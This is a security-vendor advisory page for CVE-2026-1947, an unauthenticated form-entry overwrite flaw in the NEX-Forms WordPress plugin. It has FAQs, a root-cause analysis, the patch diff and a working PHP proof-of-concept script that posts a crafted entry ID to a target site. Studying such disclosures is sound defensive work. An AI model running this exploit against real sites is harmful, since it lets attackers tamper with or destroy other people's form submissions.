What is CVE-2026-1947?

CVE-2026-1947 is a high-severity vulnerability in the NEX-Forms – Ultimate Forms Plugin for WordPress, affecting versions up to 9.1.9. It allows unauthenticated attackers to modify arbitrary form entries due to missing authorization checks in the submit_nex_form() function.

How does the vulnerability work?

The vulnerability arises from an Insecure Direct Object Reference (IDOR) where the plugin does not validate user permissions for the ‘nf_set_entry_update_id’ parameter. Attackers can send a POST request with a malicious entry ID to overwrite form entries without authentication.

Who is affected by this vulnerability?

Any WordPress site using the NEX-Forms – Ultimate Forms Plugin version 9.1.9 or earlier is potentially vulnerable. Administrators should check their plugin version against the latest available update.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the NEX-Forms plugin installed. If it is 9.1.9 or earlier, your site is at risk and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the NEX-Forms plugin to version 9.1.10 or later, where the vulnerability has been patched. Regularly updating plugins is crucial for maintaining site security.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation can lead to significant impact, including unauthorized data modification, which could compromise the integrity of form submissions.

What practical risks does this vulnerability pose?

Exploitation of this vulnerability can allow attackers to overwrite form entries, potentially leading to data loss, fraud, or the injection of malicious content into administrative views. This can harm both the site and its users.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted POST request with an arbitrary entry ID. It demonstrates the ease of overwriting existing form data without any authentication checks.

What steps can I take to mitigate this vulnerability?

In addition to updating the plugin, consider implementing web application firewalls (WAF) and monitoring for unusual activity on your forms. Regular security audits can also help identify and mitigate similar vulnerabilities.

Are there any known exploits in the wild?

As of now, there are no publicly reported active exploits specifically targeting CVE-2026-1947. However, given the nature of the vulnerability, it is advisable to take immediate action to prevent potential exploitation.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, you can temporarily disable the NEX-Forms plugin to prevent exploitation. Additionally, review server logs for any unauthorized access attempts related to form submissions.

How can I stay informed about future vulnerabilities?

To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1947: NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.9 – Missing Authorization to Unauthenticated Arbitrary Form Entry Modification via nf_set_entry_update_id (nex-forms-express-wp-form-builder)

CVE ID CVE-2026-1947

Plugin nex-forms-express-wp-form-builder

Severity High (CVSS 7.5)

CWE 639

Vulnerable Version 9.1.9

Patched Version 9.1.10

Disclosed March 13, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1947:
The vulnerability is an Insecure Direct Object Reference (IDOR) in the NEX-Forms WordPress plugin. The root cause is missing authorization and access control checks in the submit_nex_form() function. This function processes form submissions and accepts user-controlled entry IDs via the ‘nf_set_entry_update_id’ parameter. The plugin does not verify if the requesting user has permission to modify the specified form entry. The vulnerable code path starts with a direct call to submit_nex_form() in main.php when ‘nf_update_entry’ or ‘nf_create_entry’ request parameters are present. The function then checks for ‘nf_set_entry_update_id’ at line 2945. If this parameter contains a numeric entry ID, the plugin executes a SQL UPDATE statement at line 2956 using $wpdb->update() on the wap_nex_forms_entries table. The update uses the user-supplied ID directly in the WHERE clause without validation. Attackers can exploit this by sending a POST request to any page containing a NEX-Forms instance with the ‘nf_set_entry_update_id’ parameter set to an arbitrary entry ID. The payload overwrites all fields of the target entry with attacker-controlled data. The patch in version 9.1.10 removes the entire vulnerable code block. Lines 2942-2969 in main.php are deleted, eliminating the conditional logic that processed the ‘nf_set_entry_update_id’ and ‘nf_entry_redirect_id’ parameters. The patch also removes the triggering condition at lines 2701-2712 that called submit_nex_form() with the ‘update_entry’ action. This fix prevents unauthenticated entry modification by removing the vulnerable functionality entirely. Successful exploitation allows complete overwrite of any form submission stored in the database, potentially enabling data destruction, fraud, or injection of malicious content into administrative views.

Differential between vulnerable and patched code

Code Diff

--- a/nex-forms-express-wp-form-builder/includes/classes/class.db.php
+++ b/nex-forms-express-wp-form-builder/includes/classes/class.db.php
@@ -11,7 +11,6 @@

 		public function __construct(){

-			add_action('wp_ajax_deactivate_license', array($this,'deactivate_license'));
 			add_action('wp_ajax_nf_insert_record', array($this,'insert_record'));
 			add_action('wp_ajax_nf_update_record', array($this,'update_record'));
 			add_action('wp_ajax_nf_delete_record', array($this,'delete_record'));
@@ -48,7 +47,6 @@
 			add_action('wp_ajax_nf_send_test_email', array($this,'nf_send_test_email'));

 			add_action('wp_ajax_update_paypal', array($this,'update_paypal'));
-			add_action('wp_ajax_get_data', array($this,'NEXForms_get_data'));
 			add_action('wp_ajax_get_c_logic_ui', array($this,'get_c_logic_ui'));


@@ -825,42 +823,7 @@

 			die();
 		}
-		public function NEXForms_get_data(){
-
-
-				$api_params = array(
-					'verify-2' 		=> 1, //'',
-					'license' 		=> sanitize_text_field($_POST['pc']),
-					'user_name' 	=> sanitize_text_field($_POST['eu']),
-					'item_code' 	=> '7103891',
-					'email_address' => get_option('admin_email'),
-					'for_site' 		=> get_option('siteurl'),
-					'unique_key'	=> get_option('7103891'),
-					're_register'	=> (($_POST['rereg']=='false') ? false : true),
-					'version' 		=> '9'
-				);
-
-				// Call the custom API.
-				$response = wp_remote_post( 'https://basixonline.net/activate-license-new-api-v3', array(
-					'timeout'   => 30,
-					'sslverify' => false,
-					'body'      => $api_params
-				) );
-				// make sure the response came back okay
-
-				if ( is_wp_error( $response ) )
-					NEXForms_clean_echo( '<div class="alert alert-danger"><strong>Could not connect</div><br /><br />Please try again later.');
-
-				// decode the license data
-				$license_data = json_decode($response['body'],true);
-				if($license_data['error']<=0)
-					{
-					update_option( '1983017'.$license_data['key'] , array( $license_data['pc']));
-					}
-
-				NEXForms_clean_echo( sanitize_text_field($license_data['message']));
-				die();
-		}
+
 /* ALTER TABLE */
 		public function alter_plugin_table($table='', $col = '', $type='text'){

@@ -3213,18 +3176,7 @@
 		die();
 	}

-	function deactivate_license(){
-		$theme = wp_get_theme();
-		if($theme->Name!='NEX-Forms Demo')
-			{
-			global $wpdb;
-			$delete = $wpdb->query('DELETE FROM '.$wpdb->prefix.'options WHERE option_name LIKE "1983017%"'); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-			$api_params = array( 'client_deactivate_license' => 1,'version' => '9','key'=>get_option('7103891'));
-			$response = wp_remote_post( 'https://basixonline.net/activate-license-new-api-v3', array('timeout'   => 10,'sslverify' => false,'body'  => $api_params) );
-			update_option( 'nf_activated', false );
-			update_option( 'nf_fs_activated', false );
-			}
-	}
+


 	public function load_template() {
--- a/nex-forms-express-wp-form-builder/main.php
+++ b/nex-forms-express-wp-form-builder/main.php
@@ -4,7 +4,7 @@
 Plugin URI: https://basixonline.net/nex-forms/pricing/?utm_source=wordpress_fs&utm_medium=upgrade&utm_content=feature_unlock"
 Description: Premium WordPress Plugin - Ultimate Drag and Drop WordPress Forms Builder.
 Author: Basix
-Version: 9.1.9
+Version: 9.1.10
 Author URI: https://basixonline.net/nex-forms/pricing/?utm_source=wordpress_fs&utm_medium=upgrade&utm_content=feature_unlock"
 License: GPL
 Text Domain: nex-forms
@@ -2701,16 +2701,7 @@
 		 );
 	die();
 }
-$update_entry = isset($_REQUEST['nf_update_entry']) ? sanitize_text_field($_REQUEST['nf_update_entry']) : false;
-$create_entry = isset($_REQUEST['nf_create_entry']) ? sanitize_text_field($_REQUEST['nf_create_entry']) : false;

-if($update_entry || $create_entry)
-	{
-	if($update_entry)
-		submit_nex_form($entry_action = 'update_entry');
-	if($create_entry)
-		submit_nex_form($entry_action = 'update_entry');
-	}


 function submit_nex_form($entry_action = false){
@@ -2942,85 +2933,9 @@

 	if($save_to_db)
 		{
-		$check_entry_update = isset($_REQUEST['nf_set_entry_update_id']) ? sanitize_text_field($_REQUEST['nf_set_entry_update_id']) : false;
-		$check_entry_redirect_update = isset($_REQUEST['nf_entry_redirect_id']) ? sanitize_text_field($_REQUEST['nf_entry_redirect_id']) : false;


-		if($check_entry_redirect_update)
-			{
-			$get_data = $wpdb->get_var($wpdb->prepare('SELECT form_data FROM '. $wpdb->prefix .'wap_nex_forms_entries WHERE Id = %d',sanitize_text_field($check_entry_redirect_update))); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-
-			$set_data = json_decode($get_data);
-
-			$merge_data = array_merge($set_data,$data_array);
-
-			$insert = $wpdb->update($wpdb->prefix.'wap_nex_forms_entries', // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-			array(
-				'nex_forms_Id'			=>	$set_nex_forms_id,
-				'page'					=>	sanitize_text_field($_POST['page']),
-				'ip'					=>  sanitize_text_field($_POST['ip']),
-				'paypal_invoice'		=>  sanitize_text_field($_POST['paypal_invoice']),
-				'user_Id'				=>	get_current_user_id(),
-				'hostname'				=>	$geo_data->hostname,
-				'city'					=>	$geo_data->city,
-				'region'				=>	$geo_data->region,
-				'country'				=>	$geo_data->country,
-				'loc'					=>	$geo_data->loc,
-				'org'					=>	$geo_data->org,
-				'postal'				=>	$geo_data->postal,
-				'date_time'				=>  $set_date->format('Y-m-d H:i:s'),
-				'form_data'				=>	json_encode($merge_data),
-				'paypal_payment_token'	=>  $paypal_transaction['payment_token'],
-				'paypal_payment_id'		=>  $paypal_transaction['payment_id'],
-				'payment_ammount'		=>  $paypal_transaction['payment_ammount'],
-				'payment_currency'		=>  $paypal_transaction['payment_currency'],
-				'payment_status'		=>  'pending',
-				'attachments'			=> (count($insert_file_array)>0) ? 1 : NULL
-				), array(	'Id' => sanitize_text_field($check_entry_redirect_update))
-			 );
-			$get_result = $wpdb->get_var($wpdb->prepare('SELECT entry_count FROM '. $wpdb->prefix .'wap_nex_forms WHERE Id = %d',sanitize_text_field($form_attr->Id))); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-			$set_count = $get_result + 1;
-			$update = $wpdb->update ( $wpdb->prefix . 'wap_nex_forms', array('entry_count'=>$set_count), array(	'Id' => sanitize_text_field($form_attr->Id)) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-
-			$entry_id = $check_entry_redirect_update;
-
-			}

-		else if($check_entry_update)
-			{
-			$insert = $wpdb->update($wpdb->prefix.'wap_nex_forms_entries', // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-			array(
-				'nex_forms_Id'			=>	$set_nex_forms_id,
-				'page'					=>	sanitize_text_field($_POST['page']),
-				'ip'					=>  sanitize_text_field($_POST['ip']),
-				'paypal_invoice'		=>  sanitize_text_field($_POST['paypal_invoice']),
-				'user_Id'				=>	get_current_user_id(),
-				'hostname'				=>	$geo_data->hostname,
-				'city'					=>	$geo_data->city,
-				'region'				=>	$geo_data->region,
-				'country'				=>	$geo_data->country,
-				'loc'					=>	$geo_data->loc,
-				'org'					=>	$geo_data->org,
-				'postal'				=>	$geo_data->postal,
-				'date_time'				=>  $set_date->format('Y-m-d H:i:s'),
-				'form_data'				=>	json_encode($data_array),
-				'paypal_payment_token'	=>  $paypal_transaction['payment_token'],
-				'paypal_payment_id'		=>  $paypal_transaction['payment_id'],
-				'payment_ammount'		=>  $paypal_transaction['payment_ammount'],
-				'payment_currency'		=>  $paypal_transaction['payment_currency'],
-				'payment_status'		=>  'pending',
-				'attachments'			=> (count($insert_file_array)>0) ? 1 : NULL
-				), array(	'Id' => sanitize_text_field($check_entry_update))
-			 );
-			$get_result = $wpdb->get_var($wpdb->prepare('SELECT entry_count FROM '. $wpdb->prefix .'wap_nex_forms WHERE Id = %d',sanitize_text_field($form_attr->Id))); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-			$set_count = $get_result + 1;
-			$update = $wpdb->update ( $wpdb->prefix . 'wap_nex_forms', array('entry_count'=>$set_count), array(	'Id' => sanitize_text_field($form_attr->Id)) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery
-
-			$entry_id = $check_entry_update;
-
-			}
-		else
-			{
 			$insert = $wpdb->insert($wpdb->prefix.'wap_nex_forms_entries', // phpcs:ignore WordPress.DB.DirectDatabaseQuery
 				array(
 					'nex_forms_Id'			=>	$set_nex_forms_id,
@@ -3050,9 +2965,6 @@
 			$update = $wpdb->update ( $wpdb->prefix . 'wap_nex_forms', array('entry_count'=>$set_count), array(	'Id' => sanitize_text_field($form_attr->Id)) ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery

 			$entry_id = $wpdb->insert_id;
-			}
-
-

 		}
 	if($entry_action)

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1947 - NEX-Forms – Ultimate Forms Plugin for WordPress <= 9.1.9 - Missing Authorization to Unauthenticated Arbitrary Form Entry Modification via nf_set_entry_update_id

<?php

$target_url = 'https://vulnerable-site.com/'; // Change this to the target WordPress site

// Step 1: Identify a valid form entry ID to overwrite
// This could be obtained by enumerating IDs or from other leaks
$entry_id_to_overwrite = 123;

// Step 2: Prepare malicious form data
// The plugin expects form data in a specific structure
$malicious_data = array(
    'nf_set_entry_update_id' => $entry_id_to_overwrite,
    'nf_update_entry' => '1',
    // Add other form fields that will overwrite the target entry
    'field_1' => 'Malicious Value 1',
    'field_2' => 'Malicious Value 2',
    'page' => '/',
    'ip' => '127.0.0.1',
    'paypal_invoice' => ''
);

// Step 3: Send the exploit request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($malicious_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Step 4: Execute the attack
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 5: Check for success
if ($http_code == 200) {
    echo "Exploit likely succeeded. Entry ID $entry_id_to_overwrite may have been overwritten.n";
    echo "Response: " . substr($response, 0, 500) . "n";
} else {
    echo "Request failed with HTTP code: $http_coden";
}

?>

Frequently Asked Questions

What is CVE-2026-1947?
Overview of the vulnerability
CVE-2026-1947 is a high-severity vulnerability in the NEX-Forms – Ultimate Forms Plugin for WordPress, affecting versions up to 9.1.9. It allows unauthenticated attackers to modify arbitrary form entries due to missing authorization checks in the submit_nex_form() function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from an Insecure Direct Object Reference (IDOR) where the plugin does not validate user permissions for the ‘nf_set_entry_update_id’ parameter. Attackers can send a POST request with a malicious entry ID to overwrite form entries without authentication.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the NEX-Forms – Ultimate Forms Plugin version 9.1.9 or earlier is potentially vulnerable. Administrators should check their plugin version against the latest available update.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the NEX-Forms plugin installed. If it is 9.1.9 or earlier, your site is at risk and should be updated immediately.
What is the recommended fix for this vulnerability?
Updating the plugin
The recommended fix is to update the NEX-Forms plugin to version 9.1.10 or later, where the vulnerability has been patched. Regularly updating plugins is crucial for maintaining site security.
What does the CVSS score of 7.5 indicate?
Understanding the severity rating
A CVSS score of 7.5 indicates a high severity vulnerability. This means that successful exploitation can lead to significant impact, including unauthorized data modification, which could compromise the integrity of form submissions.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation of this vulnerability can allow attackers to overwrite form entries, potentially leading to data loss, fraud, or the injection of malicious content into administrative views. This can harm both the site and its users.
How does the proof of concept demonstrate the vulnerability?
Exploit example
The proof of concept provided illustrates how an attacker can exploit the vulnerability by sending a crafted POST request with an arbitrary entry ID. It demonstrates the ease of overwriting existing form data without any authentication checks.
What steps can I take to mitigate this vulnerability?
Preventative measures
In addition to updating the plugin, consider implementing web application firewalls (WAF) and monitoring for unusual activity on your forms. Regular security audits can also help identify and mitigate similar vulnerabilities.
Are there any known exploits in the wild?
Current threat landscape
As of now, there are no publicly reported active exploits specifically targeting CVE-2026-1947. However, given the nature of the vulnerability, it is advisable to take immediate action to prevent potential exploitation.
What should I do if I cannot update the plugin immediately?
Temporary workarounds
If an immediate update is not possible, you can temporarily disable the NEX-Forms plugin to prevent exploitation. Additionally, review server logs for any unauthorized access attempts related to form submissions.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
To stay informed, subscribe to security mailing lists, follow WordPress security blogs, and regularly check the official WordPress plugin repository for updates and security advisories.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations